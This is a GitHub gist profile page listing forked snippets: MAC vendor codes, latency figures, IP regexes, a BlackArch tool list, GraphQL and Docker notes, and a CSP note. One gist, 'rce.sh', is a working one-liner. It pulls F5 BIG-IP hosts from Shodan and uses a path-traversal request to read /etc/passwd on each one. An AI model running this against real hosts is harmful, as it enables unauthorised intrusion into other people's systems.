Skip to content

Instantly share code, notes, and snippets.

View ruevaughn's full-sized avatar

Chase Jensen ruevaughn

62 followers · 264 following
View GitHub Profile
@ruevaughn
ruevaughn / github-git-stuff.mkd
Created February 7, 2024 02:52 — forked from keclements/github-git-stuff
sessions
@ruevaughn
ruevaughn / mac-vendor.txt
Created December 9, 2023 12:08 — forked from aallan/mac-vendor.txt
List of MAC addresses with vendors identities
000000 Officially Xerox
000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000003 XEROX CORPORATION
000004 XEROX CORPORATION
000005 XEROX CORPORATION
000006 XEROX CORPORATION
000007 XEROX CORPORATION
000008 XEROX CORPORATION
000009 powerpipes?
@ruevaughn
ruevaughn / latency.txt
Created December 1, 2023 08:38 — forked from jboner/latency.txt
Latency Numbers Every Programmer Should Know
Latency Comparison Numbers (~2012)
----------------------------------
L1 cache reference 0.5 ns
Branch mispredict 5 ns
L2 cache reference 7 ns 14x L1 cache
Mutex lock/unlock 25 ns
Main memory reference 100 ns 20x L2 cache, 200x L1 cache
Compress 1K bytes with Zippy 3,000 ns 3 us
Send 1K bytes over 1 Gbps network 10,000 ns 10 us
Read 4K randomly from SSD* 150,000 ns 150 us ~1GB/sec SSD
@ruevaughn
ruevaughn / ip_regex.py
Created September 30, 2023 22:47 — forked from dfee/ip_regex.py
Python IPV4 / IPV6 Regular Expressions (REGEX)
# Constructed with help from
# http://stackoverflow.com/questions/53497/regular-expression-that-matches-valid-ipv6-addresses
# Try it on regex101: https://regex101.com/r/yVdrJQ/1
import re
IPV4SEG = r'(?:25[0-5]|(?:2[0-4]|1{0,1}[0-9]){0,1}[0-9])'
IPV4ADDR = r'(?:(?:' + IPV4SEG + r'\.){3,3}' + IPV4SEG + r')'
IPV6SEG = r'(?:(?:[0-9a-fA-F]){1,4})'
IPV6GROUPS = (
@ruevaughn
ruevaughn / rce.sh
Created September 28, 2023 13:17 — forked from Mad-robot/rce.sh
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
@ruevaughn
ruevaughn / gist:792d08632f112d5caaa79066d8b23918
Created September 28, 2023 13:15 — forked from sirrushoo/gist:71872b5d1dc8df159215de5aaf014384
0d1n|210.78028eb|Web security tool to make fuzzing at HTTP inputs, made in C with libCurl.| blackarch-webapp |https://github.com/CoolerVoid/0d1n
0trace|1.5|A hop enumeration tool.| blackarch-scanner |http://jon.oberheide.org/0trace/
3proxy|0.8.13|Tiny free proxy server.| blackarch-proxy |http://3proxy.ru/
3proxy-win32|0.8.13|Tiny free proxy server.| blackarch-windows |http://3proxy.ru/
42zip|42|Recursive Zip archive bomb.| blackarch-dos |http://blog.fefe.de/?ts=b6cea88d
a2sv|135.973ba13|Auto Scanning to SSL Vulnerability.| blackarch-scanner |https://github.com/hahwul/a2sv
abcd|4.2738809|ActionScript ByteCode Disassembler.| blackarch-disassembler |https://github.com/MITRECND/abcd
abuse-ssl-bypass-waf|5.3ffd16a|Bypassing WAF by abusing SSL/TLS Ciphers.| blackarch-webapp |https://github.com/LandGrey/abuse-ssl-bypass-waf
acccheck|0.2.1|A password dictionary attack tool that targets windows authentication via the SMB protocol.| blackarch-cracker |http://labs.portcullis.co.uk/tools/acccheck/
ace|1.10|Automated Corp
@ruevaughn
ruevaughn / ivre_docker-compose.yml
Created September 28, 2023 13:13 — forked from neomatrixcode/ivre_docker-compose.yml
# This file is part of IVRE.
# Copyright 2011 - 2019 Pierre LALET <[email protected]>
#
# IVRE is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# IVRE is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
@ruevaughn
ruevaughn / GraphQL introspection query via curl.md
Created August 19, 2023 09:04 — forked from martinheld/GraphQL introspection query via curl.md
GraphQL introspection query via curl

GraphQL introspection query via curl

cat introspection_query.json

{ 
  "query": "query IntrospectionQuery {
      __schema {
        queryType { name }
        mutationType { name }
@ruevaughn
ruevaughn / Dockerfile
Created August 15, 2023 10:04 — forked from vianhanif/Dockerfile
Golang (chromedp) + Xvfb + Chrome + Docker
FROM golang:1.11-alpine as builder
WORKDIR /myapp
COPY go.mod .
COPY go.sum .
RUN apk add --no-cache ca-certificates git
# Get dependancies - will also be cached if we won't change mod/sum
RUN go mod download
@ruevaughn
ruevaughn / gist:ce9106f8ab684f8f1d6a40379b8ecb7a
Created August 12, 2023 17:38 — forked from amad-person/gist:f0ef85a2123a2e1fcf8052dcf09eef90
Bypass CSP restrictions in create-react-app Chrome extensions

While building a React Chrome extension using the create-react-app utility (v2.x), I came across the following error on loading my unpacked extension:

Refused to execute inline script because it violates the following Content Security Policy directive: “script-src ‘self’
blob: filesystem: chrome-extension-resource:”. Either the ‘unsafe-inline’ keyword, a hash (‘sha256-
GgRxrVOKNdB4LrRsVPDSbzvfdV4UqglmviH9GoBJ5jk=’), or a nonce (‘nonce-…’) is required to enable inline execution.

Basically, this error arises as Chrome (or almost any modern browser) will not allow inline scripts to get executed. This CSP restriction resulted in the above error as the build script in create-react-app bundles the .js files in <script> tags in the <body> of index.html.